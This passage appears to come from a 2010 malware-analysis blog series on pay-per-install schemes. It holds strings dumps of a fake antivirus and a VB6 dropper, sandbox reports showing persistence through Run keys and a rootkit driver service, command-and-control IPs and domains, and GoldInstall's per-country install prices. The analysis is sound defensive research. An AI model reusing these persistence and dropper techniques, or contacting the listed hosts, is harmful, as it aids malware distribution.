0x00079624    0x0000000C    BackDoor-EFQ
0x00079634    0x0000000E    w32rim_mem.exe
0x00079644    0x0000000F    W32/Rimecud!mem
0x00079654    0x0000000F    gpdfsws_bbg.exe
0x00079664    0x0000001E    Generic PWS.y!bbg!06085157775A
0x00079684    0x00000008    kn.a.exe
0x00079690    0x00000040    %02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x%02x
0x000796D4    0x00000026    {3217DABC-8ACF-757B-9E6E-6F00DC89ACEB}
0x000796FC    0x00000026    {FBD69E67-C708-47be-B49F-33D4200B810D}
0x00079724    0x00000026    {ac7ddde0-7ff9-4d56-0FA9-decf41a6f167}
0x0007974C    0x0000001E    Software\AntiVirus Studio 2010
0x0007976C    0x00000015    AntiVirus Studio 2010
0x00079784    0x00000015    AntiVirus Studio 2010
0x0007979C    0x00000015    AntiVirus Studio 2010
0x000797B4    0x00000015    AntiVirus Studio 2010
0x000797CC    0x00000015    AntiVirus Studio 2010
0x000797E4    0x00000015    AntiVirus Studio 2010
0x000797FC    0x0000001E    Software\AntiVirus Studio 2010
0x0007981C    0x0000001A    \AntiVirus Studio 2010.exe
0x00079838    0x0000000F    __MessageWindow
0x0007984C    0x0000000F    __MessageWindow
0x0007985C    0x00000013    SystemTrayIconClass
0x00079870    0x00000013    SystemTrayIconClass
0x00079884    0x00000013    SystemTrayIconClass
0x000798BC    0x00000012    %s:Zone.Identifier
0x000798D4    0x00000030    SOFTWARE\Microsoft\Internet Explorer\Extensions\
0x00079908    0x00000005    CLSID
0x00079910    0x0000000F    \InprocServer32
0x00079920    0x00000006    CLSID\
0x00079928    0x00000016    \system32\kernel32.dll
0x00079940    0x00000011    Internet Explorer
0x00079984    0x0000000D    rmdir /S /Q "
0x00079998    0x00000008    del /Q "
0x000799B0    0x0000000A    if exist "
0x000799C0    0x00000008    del /Q "
0x000799CC    0x0000000E    bad allocation
0x000799DC    0x00000010    0123456789ABCDEF
0x00079A08    0x0000000E    bad allocation
0x00079A18    0x0000000E    bad allocation
0x00079A28    0x00000060    ..\..\..\..\Library\CommonLibW32\lib\src\hex.cpp
0x00079A8C    0x00000012    in && out
0x00079AA0    0x00000010    0123456789ABCDEF
0x00079AB8    0x00000060    ..\..\..\..\Library\CommonLibW32\lib\src\hex.cpp
0x00079B1C    0x00000012    in && out
0x00079B30    0x00000010    Invalid DateTime
0x00079B44    0x00000014    Invalid DateTimeSpan
0x00079B5C    0x0000000E    bad allocation
0x00079B70    0x0000000E    bad allocation
0x00079B80    0x0000002C    SOFTWARE\Microsoft\Windows NT\CurrentVersion
0x00079BB0    0x00000010    DigitalProductId
0x00079BC4    0x00000010    DigitalProductId
0x00079BDC    0x0000000E    bad allocation
0x00079BF0    0x0000000E    bad allocation
0x00079C08    0x00000066    ..\..\..\..\Library\CommonLibW32\lib\src\membuf.cpp
0x00079C70    0x00000034    offset + count <= m_length
0x00079CD8    0x0000000E    bad allocation
0x00079CE8    0x00000060    ..\..\..\..\Library\CommonLibW32\rsa\cpp\rsa.cpp
0x00079D4C    0x00000012    in && out
0x00079D60    0x00000060    ..\..\..\..\Library\CommonLibW32\rsa\cpp\rsa.cpp
0x00079DC4    0x00000012    in && out
0x00079DD8    0x0000000E    bad allocation
0x00079DE8    0x00000058    ..\..\..\..\Library\jsonlib\src\elements.cpp
0x00079E44    0x0000001A    m_pElementImp
0x00079E60    0x00000058    ..\..\..\..\Library\jsonlib\src\elements.cpp
0x00079EBC    0x0000001A    m_pElementImp
0x00079ED8    0x00000013    Array out of bounds
0x00079EEC    0x0000001E    Object member already exists: 
0x00079F0C    0x00000017    Object name not found: 
0x00079F24    0x00000010    list too long
0x0007A071    0x0000000D    ad allocation
0x0007A080    0x00000054    ..\..\..\..\Library\jsonlib\src\reader.cpp
0x0007A0D8    0x0000002A    m_iStr.eof() == false
0x0007A104    0x0000003A    m_itCurrent != m_Tokens.end()
0x0007A140    0x00000054    ..\..\..\..\Library\jsonlib\src\reader.cpp
0x0007A198    0x00000054    ..\..\..\..\Library\jsonlib\src\reader.cpp
0x0007A1F0    0x0000003A    m_itCurrent != m_Tokens.end()
0x0007A22C    0x00000024    Expected End of token stream; found 
0x0007A25C    0x00000005    false
0x0007A26C    0x00000020    Unexpected character in stream: 
0x0007A290    0x00000011    Expected string: 
0x0007A2AC    0x00000022    Invalid hex digit parsing \uXXXX: 
0x0007A2D0    0x0000002F    Unrecognized escape sequence found in string: \
0x0007A304    0x0000000F    0123456789.eE-+
0x0007A314    0x0000001E    Unexpected end of token stream
0x0007A334    0x00000012    Unexpected token: 
0x0007A348    0x0000001F    Duplicate object member token: 
0x0007A368    0x00000026    Unexpected character in NUMBER token: 
0x0007A398    0x0000001E    Unexpected End of token stream
0x0007A3B8    0x00000012    Unexpected token: 
0x0007A3E2    0x0000002C    Am_iStr.eof() == false
0x0007A410    0x00000054    ..\..\..\..\Library\jsonlib\src\reader.cpp
0x006F5420    0x000000D2    You  need  uninstall key for security reasons. To receive uninstall key press "Get Uninstall Key" button.

And this is a sandbox report of the installer.

Detailed report of suspicious malware actions:
 
Created file on defined folder: C:\Documents and Settings\Administrator\Application Data\Microsoft\Internet Explorer\Quick Launch\AntiVirus Studio 2010.lnk
Created file on defined folder: C:\Documents and Settings\Administrator\Start Menu\Programs\AntiVirus Studio 2010.lnk
Created file on defined folder: C:\Documents and Settings\Administrator\Start Menu\Programs\AntiVirus Studio 2010\Activate AntiVirus Studio 2010.lnk
Created file on defined folder: C:\Documents and Settings\Administrator\Start Menu\Programs\AntiVirus Studio 2010\AntiVirus Studio 2010.lnk
Created file on defined folder: C:\Documents and Settings\Administrator\Start Menu\Programs\AntiVirus Studio 2010\Help AntiVirus Studio 2010.lnk
Created file on defined folder: C:\Documents and Settings\Administrator\Start Menu\Programs\AntiVirus Studio 2010\How to Activate AntiVirus Studio 2010.lnk
Defined file type created: C:\Documents and Settings\Administrator\Application Data\AntiVirus Studio 2010\AntiVirus Studio 2010.exe
Defined file type created: C:\Documents and Settings\Administrator\Application Data\AntiVirus Studio 2010\securitycenter.exe
Defined file type created: C:\Documents and Settings\Administrator\Application Data\AntiVirus Studio 2010\securityhelper.exe
Defined file type created: C:\Documents and Settings\Administrator\Application Data\AntiVirus Studio 2010\taskmgr.dll
Defined file type created: C:\Documents and Settings\Administrator\Local Settings\Temp2c9c3c35bdx5.exe
Defined file type created: C:\Documents and Settings\Administrator\Local Settings\Temp\17dkf.exe
Defined file type created: C:\Documents and Settings\Administrator\Local Settings\Temp\472a10e2ebxd9.exe
Defined file type created: C:\Documents and Settings\Administrator\Local Settings\Temp\56493.exe
Defined file type created: C:\Documents and Settings\Administrator\Local Settings\Temp\ae0965a7157cd.exe
Defined file type created: C:\Documents and Settings\Administrator\Local Settings\Temp\al3erfa3.exe
Defined file type created: C:\Documents and Settings\Administrator\Local Settings\Temp\aler3fa.exe
Defined file type created: C:\Documents and Settings\Administrator\Local Settings\Temp\alerfa.exe
Defined file type created: C:\Documents and Settings\Administrator\Local Settings\Temp\backd-efq.exe
Defined file type created: C:\Documents and Settings\Administrator\Local Settings\Temp\cunifuc.exe
Defined file type created: C:\Documents and Settings\Administrator\Local Settings\Temp\dc_3.exe
Defined file type created: C:\Documents and Settings\Administrator\Local Settings\Temp\dd10x10.exe
Defined file type created: C:\Documents and Settings\Administrator\Local Settings\Temp\ddhelp.exe
Defined file type created: C:\Documents and Settings\Administrator\Local Settings\Temp\ddoll3342.exe
Defined file type created: C:\Documents and Settings\Administrator\Local Settings\Temp\dkfjd93.exe
Defined file type created: C:\Documents and Settings\Administrator\Local Settings\Temp\ds7hw.exe
Defined file type created: C:\Documents and Settings\Administrator\Local Settings\Temp\eelnvd13.exe
Defined file type created: C:\Documents and Settings\Administrator\Local Settings\Temp\eephilpe.exe
Defined file type created: C:\Documents and Settings\Administrator\Local Settings\Temp\fe.exe
Defined file type created: C:\Documents and Settings\Administrator\Local Settings\Temp\format.exe
Defined file type created: C:\Documents and Settings\Administrator\Local Settings\Temp\gedx_ae09.exe
Defined file type created: C:\Documents and Settings\Administrator\Local Settings\Temp\gpupz2a.exe
Defined file type created: C:\Documents and Settings\Administrator\Local Settings\Temp\hardwh.exe
Defined file type created: C:\Documents and Settings\Administrator\Local Settings\Temp\hhbboll_2.exe
Defined file type created: C:\Documents and Settings\Administrator\Local Settings\Temp\hiphop.exe
Defined file type created: C:\Documents and Settings\Administrator\Local Settings\Temp\hodeme.exe
Defined file type created: C:\Documents and Settings\Administrator\Local Settings\Temp\hvipws9.exe
Defined file type created: C:\Documents and Settings\Administrator\Local Settings\Temp\jdhellwo3.exe
Defined file type created: C:\Documents and Settings\Administrator\Local Settings\Temp\jofcdks.exe
Defined file type created: C:\Documents and Settings\Administrator\Local Settings\Temp\kjdh_gf_jjdhgd.exe
Defined file type created: C:\Documents and Settings\Administrator\Local Settings\Temp\kock.exe
Defined file type created: C:\Documents and Settings\Administrator\Local Settings\Temp\lols.exe
Defined file type created: C:\Documents and Settings\Administrator\Local Settings\Temp\lorsk.exe
Defined file type created: C:\Documents and Settings\Administrator\Local Settings\Temp\pswwg3c.exe
Defined file type created: C:\Documents and Settings\Administrator\Local Settings\Temp\qwedvor.exe
Defined file type created: C:\Documents and Settings\Administrator\Local Settings\Temp\qwklrvjhqlkj.exe
Defined file type created: C:\Documents and Settings\Administrator\Local Settings\Temp\r0life.exe
Defined file type created: C:\Documents and Settings\Administrator\Local Settings\Temp\rator.exe
Defined file type created: C:\Documents and Settings\Administrator\Local Settings\Temp\rtfme.exe
Defined file type created: C:\Documents and Settings\Administrator\Local Settings\Temp\safe.exe
Defined file type created: C:\Documents and Settings\Administrator\Local Settings\Temp\snowif.exe
Defined file type created: C:\Documents and Settings\Administrator\Local Settings\Temp\sycre.exe
Defined file type created: C:\Documents and Settings\Administrator\Local Settings\Temp\test.exe
Defined file type created: C:\Documents and Settings\Administrator\Local Settings\Temp\timem.exe
Defined file type created: C:\Documents and Settings\Administrator\Local Settings\Temp\wergfq.exe
Defined file type created: C:\Documents and Settings\Administrator\Local Settings\Temp\winlogoff.exe
Defined file type created: C:\Documents and Settings\Administrator\Local Settings\Temp\wqefqw7e.exe
Defined file type created: C:\Documents and Settings\Administrator\Local Settings\Temp\wrcud12.exe
Defined file type created: C:\Documents and Settings\Administrator\Local Settings\Temp\wrfwe_di.exe
Defined registry AutoStart location added or modified: machine\system\CurrentControlSet\Services\wuauserv\Start = 04000000
Defined registry AutoStart location added or modified: user\current\software\Microsoft\Windows\CurrentVersion\Run\63vnpgureoog = C:\Documents and Settings\Administrator\Desktop\installer_m_93.exe
Defined registry AutoStart location added or modified: user\current\software\Microsoft\Windows\CurrentVersion\Run\AntiVirus Studio 2010 = "C:\Documents and Settings\Administrator\Application Data\AntiVirus Studio 2010\AntiVirus Studio 2010.exe" /STARTUP
Defined registry AutoStart location added or modified: user\current\software\Microsoft\Windows\CurrentVersion\Run\SecurityCenter = C:\Documents and Settings\Administrator\Application Data\AntiVirus Studio 2010\securitycenter.exe
Internet connection: C:\Documents and Settings\Administrator\Desktop\installer_m_93.exe Connects to "92.60.177.241" on port 80 (TCP - HTTP).
Internet connection: C:\Sandbox\Administrator\DefaultBox\user\current\Application Data\AntiVirus Studio 2010\AntiVirus Studio 2010.exe Connects to "111.90.150.129" on port 80 (TCP - HTTP).
Modified or overwritten file on defined folder: C:\Documents and Settings\Administrator\Application Data\Mozilla\Firefox\Profiles\553z8yxt.default\localstore.rdf
Modified or overwritten file on defined folder: C:\Documents and Settings\Administrator\Application Data\Mozilla\Firefox\Profiles\553z8yxt.default\urlclassifierkey3.txt
Modified or overwritten file on defined folder: C:\Documents and Settings\Administrator\Local Settings\Application Data\Microsoft\Internet Explorer\MSIMGSIZ.DAT
Query DNS: httpload. net
Query DNS: www.antivirusstudio2010new. com
 
Risk evaluation result: High

This FakeAV also makes an interesting modification to the Windows Task Manager, which to the average user would probably be quiet convincing.

As well as fake Windows Security Center notifications.

Pay-Per-Install Analysis – Part Four

Mon, 26 Jul 2010 14:38:43 +0000

GoldInstall

Next we have a company called GoldInstall.

This is how much they pay for 1000 installs per country.

Country  	Price
OTH 	13$
US 	150$
GB 	110$
CA 	110$
DE 	30$
BE 	20$
IT 	65$
CH 	20$
CZ 	20$
DK 	20$
ES 	30$
AU 	55$
FR 	30$
NL 	20$
NO 	20$
PT 	30$
LB 	6$
AL 	6$
LA 	6$
AF 	6$
KZ 	6$
AE 	6$
LU 	6$
AZ 	6$
BD 	6$
BH 	6$
MN 	6$
MO 	6$
BN 	6$
MV 	6$
BT 	6$
MY 	6$
NP 	6$
CN 	6$
OM 	6$
PH 	6$
PK 	6$
CY 	6$
QA 	6$
SA 	6$
SG 	6$
SY 	6$
TW 	6$
TH 	6$
FJ 	6$
TM 	6$
HK 	6$
ID 	6$
IL 	6$
IN 	6$
UZ 	6$
IQ 	6$
IR 	6$
VN 	6$
YE 	6$
JO 	6$
JP 	6$
KH 	6$
KP 	6$
KR 	6$
KW 	6$

One thing I found quiet funny, was these 2 entries in their FAQ.

Is your software a virus?

Definitely not! We don’t do anything against computer owner. If they choose to use an Goldinstall-supported service, it is identical to accepting the mechanisms we bring (such as popup advertisements). It’s just as simple as that.

So why does my antivirus classify you as trojan/worm/virus?

AV companies have a good interest in convincing you that the Internet is an insecure place full of danger, and that almost nothing is worth of any trust (unless you use their products). We don’t share such views.

So let me get this right. AV’s are wrong to detect an application that silently downloads and executes other malware? One being a rootkit in my tests, which incidentally had “botnet” in its internal PDB path.

List of strings from the dropper, which was only packed with UPX, and compiled with Visual Basic 6.0.

0x000001B0	0x00000005	.text
0x000001D7	0x00000006	`.data
0x00000200	0x00000005	.rsrc
0x0000127C	0x0000000C	AutoDownload
0x0000128D	0x00000007	  =   3
0x000012D4	0x0000000E	lientWidSocket
0x00001368	0x00000005	Form1
0x00001372	0x00000005	Form1
0x00001589	0x0000000A	DDDDDDDDD@
0x0000168B	0x00000005	Form1
0x000016AD	0x00000006	Timer3
0x000016CE	0x00000008	dpsocket
0x000016DA	0x00000013	AutoDownload.Socket
0x00001752	0x00000005	Text1
0x00001773	0x00000006	Timer2
0x00001795	0x0000000B	WebBrowser1
0x000017A4	0x00000015	SHDocVwCtl.WebBrowser
0x00001874	0x00000006	Timer1
0x00001896	0x0000000A	vb6chs.dll
0x00001911	0x0000000C	AutoDownload
0x000022B8	0x0000004A	*\AS:\Worker\tempvbp\AutoDownload.vbp
0x000025C9	0x00000013	AutoDownload.Socket
0x000025DD	0x00000006	Socket
0x00002760	0x0000000A	ReadyState
0x0000276B	0x0000000B	shdocvw.dll
0x00002777	0x00000015	SHDocVwCtl.WebBrowser
0x0000278D	0x0000000A	WebBrowser
0x00004700	0x00000009	moduleAPI
0x0000470C	0x0000000E	moduleRegister
0x0000471C	0x0000000D	moduleWinInet
0x0000472C	0x00000005	Form1
0x00004734	0x00000013	classApplicationLog
0x00004748	0x00000007	Module1
0x00004750	0x00000007	Module2
0x00004758	0x0000000F	modSocketMaster
0x00004768	0x0000000D	CSocketMaster
0x00004778	0x00000006	Socket
0x00004780	0x0000000C	AutoDownload
0x00004794	0x00000014	USER32.DLL
0x000047B0	0x00000018	KERNEL32.DLL
0x000047D0	0x00000018	ADVAPI32.DLL
0x000047F0	0x00000016	WININET.DLL
0x0000482C	0x00000008	kernel32
0x0000483C	0x0000000C	GetLastError
0x0000484C	0x0000000B	WebBrowser1
0x00004890	0x0000000C	LoadLibraryA
0x000048D8	0x0000000E	GetProcAddress
0x00004920	0x00000006	user32
0x0000492C	0x0000000F	CallWindowProcA
0x00004974	0x0000000B	FreeLibrary
0x000049B8	0x0000000D	RtlMoveMemory
0x00004A18	0x00000006	Timer3
0x00004A64	0x00000008	VBA6.DLL
0x00004A74	0x0000000D	InternetOpenA
0x00004AB0	0x0000001A	RegOpenKeyExA
0x00004AD0	0x00000007	wininet
0x00004B20	0x00000013	InternetCloseHandle
0x00004B6C	0x00000010	InternetOpenUrlA
0x00004BB8	0x0000000B	wininet.dll
0x00004BC8	0x0000000E	HttpQueryInfoA
0x00004C10	0x00000010	InternetReadFile
0x00004C5C	0x00000012	InternetSetOptionA
0x00004D1C	0x00000035	C:\Program Files\Microsoft Visual Studio\VB98\VB6.OLB
0x00004D8C	0x00000005	Text1
0x00004DB4	0x0000001F	C:\WINDOWS\system32\shdocvw.oca
0x00004DD4	0x0000000A	SHDocVwCtl
0x00004E18	0x00000009	udpsocket
0x00004E24	0x00000006	Timer1
0x00004E2C	0x00000006	Timer2
0x00004E38	0x0000000C	advapi32.dll
0x00004E4C	0x0000000D	RegCreateKeyA
0x00004E94	0x0000000E	RegSetValueExA
0x00004EDC	0x0000000B	RegCloseKey
0x00004F20	0x0000000B	RegOpenKeyA
0x00004F64	0x00000005	Sleep
0x00004FA4	0x0000000B	shell32.dll
0x00004FB4	0x00000010	SHGetFolderPathA
0x00004FFC	0x0000000D	kjgfrtxdgqe63
0x00005014	0x00000007	udpstop
0x0000501C	0x0000000A	Decryption
0x00005028	0x00000007	GetItem
0x00005030	0x00000007	SetItem
0x00005038	0x0000000C	SaveFileText
0x00005048	0x0000000C	ReadFileText
0x00005058	0x0000000E	IsWowInstalled
0x00005068	0x0000000C	firstfucktag
0x00005078	0x00000007	SConfig
0x000050E4	0x0000000B	GlobalAlloc
0x000050F0	0x0000000C	SocketHandle
0x00005100	0x00000007	connect
0x00005140	0x0000000A	GlobalFree
0x00005184	0x0000000A	ws2_32.dll
0x00005194	0x0000000A	WSAStartup
0x000051D8	0x0000000A	WSACleanup
0x0000521C	0x00000015	WSAAsyncGetHostByName
0x0000526C	0x0000000E	WSAAsyncSelect
0x000052B4	0x0000000F	CreateWindowExA
0x000052C4	0x00000008	CloseSck
0x00005308	0x0000000D	DestroyWindow
0x00005350	0x00000008	lstrlenA
0x00005394	0x00000008	lstrcpyA
0x000053D8	0x00000008	SetTimer
0x0000541C	0x00000009	KillTimer
0x00005460	0x00000008	IsWindow
0x0000547C	0x0000000D	BytesReceived
0x000054CC	0x0000000E	GetWindowLongA
0x00005514	0x0000000E	SetWindowLongA
0x0000555C	0x00000010	GetModuleHandleA
0x00005640	0x00000005	Class
0x00005648	0x00000008	Protocol
0x00005654	0x00000022	C:\WINDOWS\system32\msvbvm60.dll\3
0x00005678	0x00000005	VBRUN
0x000056AC	0x00000006	socket
0x000056EC	0x0000000A	GlobalLock
0x00005730	0x0000000C	GlobalUnlock
0x00005778	0x00000005	htons
0x000057B8	0x00000005	ntohs
0x000057F8	0x00000007	connect
0x00005844	0x0000000B	gethostname
0x00005888	0x0000000D	gethostbyname
0x00005910	0x0000000B	getsockname
0x00005954	0x0000000B	getpeername
0x00005998	0x00000009	inet_addr
0x00005A10	0x00000006	sendto
0x00005A50	0x0000000A	getsockopt
0x00005A94	0x0000000A	setsockopt
0x00005B18	0x00000008	recvfrom
0x00005B5C	0x00000015	WSACancelAsyncRequest
0x00005B74	0x00000005	State
0x00005B7C	0x0000000D	LocalHostName
0x00005B8C	0x00000007	LocalIP
0x00005BD0	0x00000006	listen
0x00005C10	0x00000006	accept
0x00005C50	0x00000009	inet_ntoa
0x00005C94	0x0000000B	ioctlsocket
0x00005CD8	0x0000000B	closesocket
0x00005D18	0x00000007	WndProc
0x00005D20	0x0000000A	RemotePort
0x00005D2C	0x0000000A	RemoteHost
0x00005D38	0x0000000C	RemoteHostIP
0x00005D48	0x00000009	LocalPort
0x00005D58	0x00000008	SendData
0x00005D64	0x00000007	GetData
0x00005D6C	0x00000008	PeekData
0x00005D78	0x00000006	Listen
0x00005D80	0x00000006	Accept
0x00005D88	0x00000011	ConnectionRequest
0x00005D9C	0x0000000B	DataArrival
0x00005DA8	0x00000005	Error
0x00005DB0	0x0000000C	SendComplete
0x00005DC0	0x0000000C	SendProgress
0x00005F00	0x0000000C	netapi32.dll
0x00005F18	0x00000007	Netbios
0x00005F58	0x0000000E	GetProcessHeap
0x00005FA0	0x00000009	HeapAlloc
0x00005FE4	0x00000008	HeapFree
0x00006094	0x0000000D	GetVersionExA
0x00006100	0x0000000B	CreateFileA
0x00006144	0x0000000F	DeviceIoControl
0x0000618C	0x0000000B	CloseHandle
0x000061D0	0x00000015	GetVolumeInformationA
0x00006284	0x00000012	GetModuleFileNameA
0x000062D0	0x00000013	GetCurrentProcessId
0x00006320	0x00000008	FlushLog
0x00006358	0x00000015	cmSocket_SendProgress
0x0000638C	0x0000001C	CreateShortcut
0x000063AC	0x00000014	TargetPath
0x000063D8	0x00000020	WorkingDirectory
0x00006434	0x00000012	ExecQuery
0x00006448	0x00000014	MACAddress
0x000064B8	0x0000000C	EbMode
0x000064CC	0x0000001C	SetWindowLongA
0x000064F0	0x0000001E	CallWindowProcA
0x00006514	0x00000014	WSACleanup
0x00006530	0x00000012	KillTimer
0x00006568	0x0000000C	user32
0x0000657C	0x0000000C	ws2_32
0x0000658C	0x0000000E	cmSocket_Error
0x0000659C	0x00000015	cmSocket_SendComplete
0x00006628	0x0000000B	UserControl
0x00006634	0x00000008	cmSocket
0x00006640	0x00000011	cmSocket_CloseSck
0x00006654	0x00000010	cmSocket_Connect
0x00006668	0x0000001A	cmSocket_ConnectionRequest
0x00006684	0x00000014	cmSocket_DataArrival
0x000066A0	0x00000012	LocalPort
0x000066C8	0x00000010	Protocol
0x000066E0	0x00000014	RemoteHost
0x000066FC	0x00000014	RemotePort
0x00006784	0x00000006	Socket
0x0001B39C	0x00000025	SAFE_rGX8EhiOOnz7qnE0cOpCKcNDUhe57Sli
0x0001B3C4	0x00000025	SAFE_wXfFU0GiYdAvUQ86skySPaU80AmMHnmw
0x0001B3EC	0x00000025	SAFE_4fDBPXBwTcNF4WpeuDSuwqcW3psMwB0f
0x0001B414	0x00000025	SAFE_CU5ZIkuee8iXHaYeF0XH07I12WnVk4NM
0x0001B43C	0x00000025	SAFE_Ukw8ASw6d514KXPxkGUCxCJ89lOobEip
0x0001B464	0x00000006	iSplit
0x0001B46C	0x00000025	SAFE_TzIyaWLC083eHor12AAAXyzARroaoCl7
0x0001B494	0x00000025	SAFE_lF9XRDNe05MAKliKXQ75U40IY6PsfM6a
0x0001B4BC	0x00000025	SAFE_n5qnjCxOP7ZeVOOX2TLLvDCogYRVYSUI
0x0001B4E4	0x00000025	SAFE_Uj0uzUEwwlL7B4YJJgs45Rdz2oEQLD8U
0x0001B50C	0x00000025	SAFE_mzrUqCGPviedE1Pcoxpz2We782pjCNUw
0x0001B534	0x00000025	SAFE_X8QUuSJSJc12iEyzfDnXJgOweBRL5Bts
0x0001B55C	0x00000025	SAFE_8mGmoaasaLRD5fHYjqVi04xGvoTiqark
0x0001B590	0x00000025	SAFE_eTgd1MK7Yy2XtTCJ2xKTBn5ayGXzlGi9
0x0001B5B8	0x00000025	SAFE_wjXCs4MaYvL4wQ3cWDHO8t6i5V8HcQ3c
0x0001B5E0	0x00000025	SAFE_xaESA2wJxxZY73kp2GVdZ2HFDxAuVWSL
0x0001B608	0x00000025	SAFE_Fp521kylwus4A0b8WWSYV7IMKClDLhno
0x0001B630	0x00000025	SAFE_WYQHz1fvKVyxUS2HORFM9RioUYC8UsUi
0x0001B658	0x00000025	SAFE_p7w6cFENZMIBQFccDq7StOvuDjNVqpIL
0x0001B680	0x00000025	SAFE_xjzfjrRvFgBPyI9Ly7RSulUXFJRDsgm5
0x0001B6A8	0x00000025	SAFE_9S0STCtgN17H8PFHBODi0juoUEuZBReV
0x0001B6D0	0x00000025	SAFE_sYcsc0R6Dngoyzvsj9HSEAwZjIvmvX46
0x0001B6F8	0x00000025	SAFE_mOf9lycdfUgnHchmTmCVrEGKeNU0qLFx
0x0001B720	0x00000025	SAFE_fnIuiVsEdGGHBupQQDw8R6lV8rCKRlEH
0x0001B748	0x00000025	SAFE_T571D8NHgN0hn6pJqX9ssVAJPflUAka5
0x0001B770	0x00000025	SAFE_lLyb4qPjfKJEq4gcKn6npaBRVuMn1uvY
0x0001B798	0x00000025	SAFE_RdiVDGLIzkh9zIdkFamXWBxLKNsKF985
0x0001B7C0	0x00000025	SAFE_OX7ybJucwnBnYa0uh44S3EAdOoyyUW3F
0x0001B7E8	0x00000025	SAFE_POnEsHULLpOHjDh7D7JhUOMAWG0aNcSx
0x0001B810	0x00000025	SAFE_heeojzWnKmhomAYQhNGcQTNIdVbtEnnQ
0x0001B838	0x00000025	SAFE_mZH4O1J1aXfWesOSmxySseAFZeDEShAK
0x0001B860	0x00000025	SAFE_oQxKf0tkzZt0pV5gH0CiJnMmh6GrLnZ2
0x0001B888	0x00000025	SAFE_pGeaxyUTOa6Uz8mtm2QxkxYIqZJTEuxl
0x0001B8B0	0x00000025	SAFE_GqZAWhIKHz2Tu42yAKSO68W8O0uBp8PG
0x0001B8D8	0x00000009	requestID
0x0001B8E4	0x0000000A	bytesTotal
0x0001B8F0	0x00000006	Number
0x0001B8F8	0x0000000B	Description
0x0001B904	0x00000005	sCode
0x0001B90C	0x00000006	Source
0x0001B914	0x00000008	HelpFile
0x0001B920	0x0000000B	HelpContext
0x0001B92C	0x0000000D	CancelDisplay
0x0001B93C	0x00000009	bytesSent
0x0001B948	0x0000000E	bytesRemaining
0x0001B958	0x00000025	SAFE_YoiwczIxR2qYF6Prg6qac9HgIRnEY8PX
0x0001B994	0x0000003F	Returns/Sets the port to be connected to on the remote computer
0x0001B9D4	0x00000007	lngPort
0x0001B9DC	0x00000020	Returns/Sets the socket protocol
0x0001BA00	0x0000000B	enmProtocol
0x0001BA0C	0x0000003A	Returns/Sets the name used to identify the remote computer
0x0001BA48	0x00000007	strHost
0x0001BA50	0x00000022	Returns the remote host IP address
0x0001BA74	0x00000030	Returns/Sets the port used on the local computer
0x0001BAA8	0x0000002A	Returns the state of the socket connection
0x0001BAD4	0x0000001E	Returns the local machine name
0x0001BAF4	0x00000024	Returns the local machine IP address
0x0001BB1C	0x00000037	Returns the number of bytes received on this connection
0x0001BB54	0x00000019	Returns the socket handle
0x0001BB70	0x00000050	Returns or sets an expression that stores any extra data needed for your program
0x0001BBC4	0x00000006	strTag
0x0001BBCC	0x00000025	Accept an incoming connection request
0x0001BBF4	0x00000009	LocalPort
0x0001BC00	0x00000007	LocalIP
0x0001BC08	0x00000029	Binds socket to specific port and adapter
0x0001BC34	0x00000018	Close current connection
0x0001BC50	0x0000000A	RemoteHost
0x0001BC5C	0x0000000A	RemotePort
0x0001BC68	0x0000001E	Connect to the remote computer
0x0001BC90	0x00000007	varType
0x0001BC98	0x00000006	maxLen
0x0001BCA0	0x00000029	Retrieve data sent by the remote computer
0x0001BCCC	0x00000027	Listen for incoming connection requests
0x0001BCF4	0x00000039	Look at incoming data without removing it from the buffer
0x0001BD30	0x0000001C	Send data to remote computer
0x0001BD50	0x00000034	Occurs when a remote client is attempting to connect
0x0001BD8C	0x0000003B	Occurs when data has been received from the remote computer
0x0001BDC8	0x0000000E	Error occurred
0x0001BDD8	0x0000002B	Occurs after a send operation has completed
0x0001BE04	0x00000025	Occurs during process of sending data
0x000536A0	0x0000000C	MSVBVM60.DLL
0x000536B0	0x00000018	EVENT_SINK_GetIDsOfNames
0x000536CA	0x0000000E	MethCallEngine
0x000536DA	0x00000011	EVENT_SINK_Invoke
0x000536EE	0x00000012	Zombie_GetTypeInfo
0x00053702	0x00000011	EVENT_SINK_AddRef
0x00053716	0x0000000F	DllFunctionCall
0x00053728	0x00000017	Zombie_GetTypeInfoCount
0x00053742	0x00000012	EVENT_SINK_Release
0x00053756	0x00000019	EVENT_SINK_QueryInterface
0x00053772	0x00000012	__vbaExceptHandler
0x00053786	0x0000000E	ProcCallEngine
0x0005413E	0x0000000C	CONFIG
0x00054339	0x0000000A	DDDDDDDDD@
0x00054452	0x0000001E	VS_VERSION_INFO
0x000544AE	0x00000016	VarFileInfo
0x000544CE	0x00000016	Translation
0x000544F2	0x0000001C	StringFileInfo
0x00054516	0x00000010	080404B0
0x0005452E	0x00000016	CompanyName
0x00054552	0x00000016	ProductName
0x0005457A	0x00000016	FileVersion
0x000545A6	0x0000001C	ProductVersion
0x000545D6	0x00000018	InternalName
0x00054602	0x00000020	OriginalFilename
0x00054624	0x00000010	dick.exe

Sandbox report of the dropper.

Detailed report of suspicious malware actions:
 
Created file on defined folder: C:\Documents and Settings\Administrator\Local Settings\Temp\~DFE274.tmp
Defined file type copied to Windows folder: C:\WINDOWS\system32\drivers\zgiejqbqy7.sys
Defined file type created: C:\Documents and Settings\Administrator\Local Settings\Temp\geurge.exe
Defined registry AutoStart location added or modified: machine\software\microsoft\Windows\CurrentVersion\Run\ewrgetuj = C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\geurge.exe
Defined registry AutoStart location added or modified: machine\system\CurrentControlSet\Services\zgiejqbqy7\DisplayName = zgiejqbqy7
Defined registry AutoStart location added or modified: machine\system\CurrentControlSet\Services\zgiejqbqy7\ImagePath = system32\drivers\zgiejqbqy7.sys
Defined registry AutoStart location added or modified: machine\system\CurrentControlSet\Services\zgiejqbqy7\Start = 01000000
Defined registry AutoStart location added or modified: machine\system\CurrentControlSet\Services\zgiejqbqy7\Type = 01000000
Internet connection: C:\Documents and Settings\Administrator\Local Settings\Temp\geurge.exe Connects to "122.224.6.48" on port 88 (TCP).
Internet connection: C:\Documents and Settings\Administrator\current\Local Settings\Temp\geurge.exe Connects to "93.174.92.220" on port 80 (TCP - HTTP).
Query DNS: config.perfectexe.com
Query DNS: ghucom.com
 
Risk evaluation result: High

Strings from the rootkit driver I spoke of earlier.

0x00000377	0x00000006	h.text
0x0000039F	0x00000006	h.data
0x000003C8	0x00000006	.cdata
0x00000418	0x00000006	.reloc
0x00001EA9	0x00000005	8SVWh
0x000024AD	0x00000005	VVVVh
